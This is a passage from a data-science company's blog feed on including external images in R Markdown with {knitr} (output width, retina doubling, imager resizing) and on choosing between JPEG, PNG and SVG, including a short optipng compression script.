Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2021-knitr-include-graphics-external"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="including-images-in-an-r-markdown-file"&gt;Including images in an R markdown File&lt;/h2&gt;
&lt;p&gt;We can include an image using {knitr} and the &lt;code&gt;include_graphics()&lt;/code&gt;
function, e.g.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;include_graphics&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;office_square.jpeg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Typically the chunk would use &lt;code&gt;echo = FALSE&lt;/code&gt; as we don’t want to see the
actual R code. As the image isn’t being generated by R, the chunk
arguments &lt;code&gt;fig.width&lt;/code&gt; and &lt;code&gt;fig.height&lt;/code&gt; are redundant here - these
arguments only affect graphics that are &lt;em&gt;generated&lt;/em&gt; by R.&lt;/p&gt;
&lt;p&gt;There are four core arguments for controlling how and where the image
is displayed:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;fig.align&lt;/code&gt;. Default &lt;code&gt;left&lt;/code&gt;. In this page, I’ve set that to
&lt;code&gt;center&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;out.width&lt;/code&gt; &amp;amp; &lt;code&gt;out.height&lt;/code&gt; control the output width / height,
in pixels or percentages. The &lt;code&gt;%&lt;/code&gt; refers to the percent of the HTML
container.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fig.retina&lt;/code&gt; takes a value &lt;code&gt;1&lt;/code&gt; or &lt;code&gt;2&lt;/code&gt;, with the default being &lt;code&gt;2&lt;/code&gt;
(discussed below)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The arguments to control the output width / height are &lt;code&gt;out.width&lt;/code&gt; /
&lt;code&gt;out.height&lt;/code&gt;, which accept sizes as pixels or percentages, using the
string &lt;code&gt;%&lt;/code&gt; or &lt;code&gt;px&lt;/code&gt; as a suffix. The &lt;code&gt;%&lt;/code&gt; refers to the percent of the
HTML container. The crucial thing to note is that if we set the
width &amp;amp; height smaller than the actual image, then the browser will
scale the image down, but the image file will still be the same size, potentially
impacting page speeds.&lt;/p&gt;
&lt;p&gt;Setting &lt;code&gt;out.width=&amp;quot;200px&amp;quot;&lt;/code&gt; and &lt;code&gt;fig.retina=1&lt;/code&gt; (we’ll cover retina
below), will put our &lt;code&gt;400px&lt;/code&gt; square image in a &lt;code&gt;200px&lt;/code&gt; box. If you right
click on the image and select &lt;em&gt;View Image&lt;/em&gt;, you’ll see that the image is
larger than the version displayed below.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# out.width=&amp;#34;200px&amp;#34;, fig.retina = 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;include_graphics&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;office_square.jpeg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/knitr-include-graphics-external/office_square.jpeg" title="The JR office at 200px" alt="The JR office at 200px" style="width:200px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;Setting &lt;code&gt;out.width=&amp;quot;400px&amp;quot;&lt;/code&gt; and &lt;code&gt;fig.retina=1&lt;/code&gt; displays the 400px image
in a 400px box (depending on your screen).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# out.width=&amp;#34;400px&amp;#34;, fig.retina = 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;include_graphics&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;office_square.jpeg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/knitr-include-graphics-external/office_square.jpeg" title="The JR office at 400px" alt="The JR office at 400px" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;When thinking about images on web-pages, the main things to consider are&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;figure dimensions: do they match your HTML box?&lt;/li&gt;
&lt;li&gt;file size: too large and your page speed will become too slow.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In the above example, &lt;code&gt;office_square.jpeg&lt;/code&gt; is less than 30KB and has the
correct dimensions. If the file is only 30KB, life is too short to worry
about it being too large. However, the original image, &lt;code&gt;office.jpeg&lt;/code&gt;, was
3.4MB. This would have a detrimental effect on download speeds and just
annoy viewers.&lt;/p&gt;
&lt;p&gt;My rough rule of thumb is not to worry about image sizes on a page, if
the total size of all images is less than 1MB. For blog posts, I rarely
worry. However, for our &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;course
pages&lt;/a&gt;, which have
images associated with our training courses, a little more care
needs to be taken.&lt;/p&gt;
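&lt;p&gt;The 1MB rule of thumb is easy to check from R. The sketch below uses base R only; &lt;code&gt;images_within_budget()&lt;/code&gt; is a hypothetical helper, and the temporary files merely stand in for real images.&lt;/p&gt;

```r
# Hypothetical helper: is the total size of the images within the budget?
images_within_budget = function(paths, budget_bytes = 1024^2) {
  total = sum(file.size(paths))
  budget_bytes >= total
}

# Demonstration with two temporary files standing in for images
tmp = file.path(tempdir(), c("a.jpeg", "b.jpeg"))
writeBin(raw(30 * 1024), tmp[1])   # a 30KB file
writeBin(raw(200 * 1024), tmp[2])  # a 200KB file

images_within_budget(tmp)
```

&lt;p&gt;In practice, &lt;code&gt;paths&lt;/code&gt; could come from &lt;code&gt;list.files()&lt;/code&gt; pointed at the directory holding the images for a page.&lt;/p&gt;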
&lt;h2 id="the-retina-setting"&gt;The Retina Setting&lt;/h2&gt;
&lt;p&gt;As we discussed in previous blog posts, the argument &lt;code&gt;fig.retina&lt;/code&gt; allows
you to produce a figure that looks crisper on high-resolution (retina) displays.
When we create an R graphic, &lt;code&gt;fig.retina&lt;/code&gt; automatically doubles the
resolution. To achieve this improved quality in external graphics, we
need to double the dimensions of the image we wish to include. In our
example above, this would mean creating an image of 800px by 800px to
put into our 400px by 400px box, e.g.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Double the size for retina&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;scale &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;max&lt;/span&gt;(d &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;800&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;img &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; imager&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;resize&lt;/span&gt;(original,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;width&lt;/span&gt;(original) &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; scale,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;height&lt;/span&gt;(original) &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; scale,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; interpolation_type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;square_img &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; imager&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pad&lt;/span&gt;(img,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; nPix &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;800&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;height&lt;/span&gt;(img),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;y&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; val &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;white&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;imager&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;save.image&lt;/span&gt;(square_img, file &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;office_square-retina.jpeg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In {knitr} itself the default value of &lt;code&gt;fig.retina&lt;/code&gt; is 1, but {rmarkdown} HTML formats such as &lt;code&gt;html_document&lt;/code&gt; set it to 2.&lt;/p&gt;
&lt;p&gt;When we omit &lt;code&gt;out.width&lt;/code&gt;, the output &lt;code&gt;width&lt;/code&gt; of the image is the minimum of&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the width of the HTML container&lt;/li&gt;
&lt;li&gt;the width of the image / &lt;code&gt;fig.retina&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Hence, if we have a chunk with no options, this figure&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Image is 400px, output at 200px due to fig.retina=2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;include_graphics&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;office_square.jpeg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/knitr-include-graphics-external/office_square.jpeg" title="Image with fig.retina=1" alt="Image with fig.retina=1" style="width:200px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;is output at 200px wide, while the retina image is output at 400px&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Image is 800px, output at 400px due to fig.retina=2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;include_graphics&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;office_square-retina.jpeg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/knitr-include-graphics-external/office_square-retina.jpeg" title="Image with fig.retina=2" alt="Image with fig.retina=2" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
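&lt;p&gt;The rule above can be sketched as a one-line calculation. The helper &lt;code&gt;displayed_width()&lt;/code&gt; is purely illustrative (it is not a {knitr} function), the 700px container is an assumed value, and the sketch ignores any other chunk options.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper, not part of {knitr}: approximate displayed width in px
# when out.width is omitted
displayed_width = function(image_width, container_width, fig_retina = 2) {
  min(container_width, image_width / fig_retina)
}
# Assumed 700px wide HTML container
displayed_width(400, container_width = 700)  # 200
displayed_width(800, container_width = 700)  # 400
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;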
&lt;h2 id="resizing-your-image"&gt;Resizing your image&lt;/h2&gt;
&lt;p&gt;The eagle-eyed readers amongst you will have noticed that we slipped an
additional argument into the &lt;code&gt;imager::resize()&lt;/code&gt; call above,
&lt;code&gt;interpolation_type = 6&lt;/code&gt;. Like most users of software, I prefer keeping
values at their defaults. In this case, however, the default produced
terrible results.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;interpolation_type&lt;/code&gt; argument controls the method of interpolation.
The default value of &lt;code&gt;1&lt;/code&gt; corresponds to nearest-neighbour interpolation,
&lt;code&gt;5&lt;/code&gt; corresponds to cubic interpolation (which is the default that
&lt;a href="https://www.gimp.org/" rel="external"&gt;GIMP&lt;/a&gt; uses), and &lt;code&gt;6&lt;/code&gt; to Lanczos.&lt;/p&gt;
&lt;p&gt;According to this
&lt;a href="https://graphicdesign.stackexchange.com/questions/26385/difference-between-none-linear-cubic-and-sinclanczos3-interpolation-in-image" rel="external"&gt;Stack Exchange&lt;/a&gt;
answer,&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;(lanczos) is much like cubic except that instead of blurring, it
(lanczos) creates a “ringing” pattern. The benefit is that it can
handle detailed graphics without blurring like the cubic filters.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If we put the output of each method side-by-side, the nearest-neighbour
version doesn’t capture the lines quite as well as Lanczos.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/knitr-include-graphics-external/combined.jpeg" title="Comparison of scaling methods." alt="Comparison of scaling methods." style="display: block; margin: auto;" /&gt;
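&lt;p&gt;A comparison along these lines could be produced roughly as follows. This is only a sketch: it uses the &lt;code&gt;boats&lt;/code&gt; example image shipped with {imager} rather than the office photograph, the helper &lt;code&gt;shrink()&lt;/code&gt; and the output file name are made up for illustration, and it is not necessarily how the figure above was built.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;imager&amp;#34;)
# boats is an example image that comes with {imager}; swap in your own image
original = imager::boats
scale = 2
# Hypothetical helper: halve the image using a given interpolation method
shrink = function(type) {
  imager::resize(original,
                 imager::width(original) / scale,
                 imager::height(original) / scale,
                 interpolation_type = type)
}
# Nearest-neighbour (1), cubic (5) and Lanczos (6), joined left to right
combined = imager::imappend(list(shrink(1), shrink(5), shrink(6)), axis = &amp;#34;x&amp;#34;)
imager::save.image(combined, file = &amp;#34;combined-sketch.jpeg&amp;#34;)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;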
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/knitr-include-graphics-external/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Selecting the correct image file type</title><link>https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/</link><pubDate>Fri, 19 Feb 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/featured-1.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part two of our four-part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: Specifying the &lt;a href="https://www.jumpingrivers.com/blog/knitr-rmarkdown-image-size/" rel="external"&gt;correct figure dimension&lt;/a&gt; in {knitr}.&lt;/li&gt;
&lt;li&gt;Part 2: What &lt;a href="https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/" rel="external"&gt;image format&lt;/a&gt; should you use for graphics (this post).&lt;/li&gt;
&lt;li&gt;Part 3: Including &lt;a href="https://www.jumpingrivers.com/blog/knitr-include-graphics-external/" rel="external"&gt;external graphics&lt;/a&gt; in your document.&lt;/li&gt;
&lt;li&gt;Part 4: Setting default {knitr} &lt;a href="https://www.jumpingrivers.com/blog/knitr-default-options-settings-hooks/" rel="external"&gt;options&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There are (at least) three file formats to choose from: JPEG, PNG and SVG.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Attribute&lt;/th&gt;
&lt;th&gt;JPEG&lt;/th&gt;
&lt;th&gt;PNG&lt;/th&gt;
&lt;th&gt;SVG&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Type&lt;/td&gt;
&lt;td&gt;Raster&lt;/td&gt;
&lt;td&gt;Raster&lt;/td&gt;
&lt;td&gt;Vector&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Transparency&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Animation&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lossy&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Recommended&lt;/td&gt;
&lt;td&gt;Occasionally&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Often&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;If you are reading this via a syndication site, be sure to go to the &lt;a href="https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/" rel="external"&gt;original post&lt;/a&gt; for updated links.&lt;/p&gt;
&lt;h3 id="jpeg-images"&gt;JPEG Images&lt;/h3&gt;
&lt;p&gt;As the JPEG compression algorithm significantly reduces file size, JPEG files are ubiquitous across the web.
If you take a photo on your camera, it&amp;rsquo;s almost certainly using a JPEG storage format.
Historically the file extension was &lt;code&gt;.jpg&lt;/code&gt; as Microsoft Windows only handled
three character file extensions (also &lt;code&gt;.htm&lt;/code&gt; vs &lt;code&gt;.html&lt;/code&gt;).
But today both extensions are used (personally I prefer &lt;code&gt;.jpeg&lt;/code&gt;, but I&amp;rsquo;m not very consistent if I&amp;rsquo;m
totally honest).&lt;/p&gt;
&lt;p&gt;If you did a little Googling on which file format to use for images, then the answer you
would come across is that JPEGs are the default choice.
But remember, figures are different from standard images! R figures have
text, straight lines, lots of white space, and perhaps transparency.&lt;/p&gt;
&lt;p&gt;However,&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;JPEGs don&amp;rsquo;t support transparency.&lt;/li&gt;
&lt;li&gt;The algorithm used to compress a JPEG image is based on the &lt;a href="https://en.m.wikipedia.org/wiki/Discrete_cosine_transform" rel="external"&gt;discrete cosine transform (DCT)&lt;/a&gt;.
Essentially, similar pixels within an image are merged.
This averaging process means that the method is lossy, i.e. by storing the image
as a JPEG, we are losing information.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;So in general don&amp;rsquo;t use JPEGs. The only exception might be when you have a &amp;ldquo;photograph-type&amp;rdquo;
plot, such as a detailed contour or heatmap. You would only consider this, however, if the file
size of the PNG was large.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2021-knitr-image-png-jpeg-svg-rmarkdown"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="portable-network-graphics-pngs"&gt;Portable Network Graphics (PNGs)&lt;/h3&gt;
&lt;p&gt;A Portable Network Graphics file (PNG) is a raster file format that uses lossless compression.
It was originally created as a replacement for the GIF, but unlike GIFs, PNG files
don&amp;rsquo;t support animations.&lt;/p&gt;
&lt;p&gt;While a PNG&amp;rsquo;s file size is usually a little larger than a JPEG&amp;rsquo;s, PNG is usually the better default option. For a &lt;a href="https://www.jumpingrivers.com/blog/r-knitr-markdown-png-pdf-graphics/" rel="external"&gt;nicer&lt;/a&gt;, smoother image, you should use &lt;code&gt;type = &amp;quot;cairo-png&amp;quot;&lt;/code&gt; when creating a &lt;code&gt;png&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The size of a PNG can often be reduced using the &lt;a href="http://optipng.sourceforge.net/" rel="external"&gt;optipng&lt;/a&gt;
utility. For graphs, a reduction of around 50% isn&amp;rsquo;t unusual.
Running &lt;code&gt;optipng&lt;/code&gt; takes around one to two seconds per image, so it isn&amp;rsquo;t really suitable
for dynamic applications, e.g. Shiny apps. However, for images that will never change, e.g. those in blog posts, an extra second or two is not an issue.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;ve already created a bunch of images, then a simple R script can
easily optimise all files&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;png_files &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list.files&lt;/span&gt;(pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\.png$&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; full.names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; recursive &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; (png &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; png_files) &lt;span style="color:#d2a8ff;font-weight:bold"&gt;system2&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;optipng&amp;#34;&lt;/span&gt;, png)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;optipng&lt;/code&gt; utility has an optimisation-level option that lets you trade run time for
smaller PNG files, e.g.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;system2&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;optipng&amp;#34;&lt;/span&gt;, args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;-o1&amp;#34;&lt;/span&gt;, png))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The argument &lt;code&gt;-o&lt;/code&gt; selects the optimisation level. The higher the number, the harder &lt;code&gt;optipng&lt;/code&gt; tries
to compress. To be honest, I&amp;rsquo;ve found leaving the level at its default to be
more than sufficient. Life is too short to worry about the odd byte.&lt;/p&gt;
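&lt;p&gt;If you want to see how much is actually saved, a small wrapper can record the file size before and after. The sketch below is illustrative only: &lt;code&gt;optimise_png()&lt;/code&gt; is a made-up helper name, and it assumes the &lt;code&gt;optipng&lt;/code&gt; binary is installed and on your PATH (it skips the file with a warning otherwise).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper: optimise one PNG in place and return the bytes saved
optimise_png = function(png) {
  # Sys.which() returns an empty string when the program cannot be found
  if (!nzchar(Sys.which(&amp;#34;optipng&amp;#34;))) {
    warning(&amp;#34;optipng not found on the PATH; skipping &amp;#34;, png)
    return(invisible(NA_real_))
  }
  before = file.size(png)
  # shQuote() protects file names that contain spaces
  system2(&amp;#34;optipng&amp;#34;, args = shQuote(png), stdout = FALSE, stderr = FALSE)
  before - file.size(png)
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Calling &lt;code&gt;sapply(png_files, optimise_png)&lt;/code&gt; would then give the saving, in bytes, for each file.&lt;/p&gt;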
&lt;h3 id="scalable-vector-graphics-svgs"&gt;Scalable Vector Graphics (SVGs)&lt;/h3&gt;
&lt;p&gt;A Scalable Vector Graphics file (SVG) uses an XML-based format to precisely
describe how the image should appear. Since the graph is described using text,
an SVG can be scaled to different sizes without losing quality, i.e. we no longer
worry about resolution.&lt;/p&gt;
&lt;p&gt;This format is particularly appealing for figures, which are simply a combination of lines, text and shapes. The downside is that file sizes can get prohibitively large. For example,
if you have a scatter plot with lots of points, each individual point will have its
own entry in the SVG file.&lt;/p&gt;
&lt;p&gt;To understand the trade-offs a bit more, let&amp;rsquo;s create multiple {ggplot2} scatter plots where
we gradually increase the number of points&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
